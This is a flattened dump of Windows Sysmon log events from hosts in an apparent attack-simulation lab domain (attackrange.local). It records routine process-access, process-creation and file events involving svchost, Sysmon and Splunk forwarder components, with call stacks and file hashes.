07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.980{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.980{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.636{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF65A053BEA574591998FDD9C246F52F,SHA256=09ABFDA1E83743F76CABDC1A5DFC1E5383955AE70D652522DCBC0239EE7C6960,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.308{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.293{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FC448D2D37965AE2AC15A0A822BD140,SHA256=A64D56CF6E2C78C8A9A092F7A0350BE5A80948C6923F7256546C2D556C441898,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
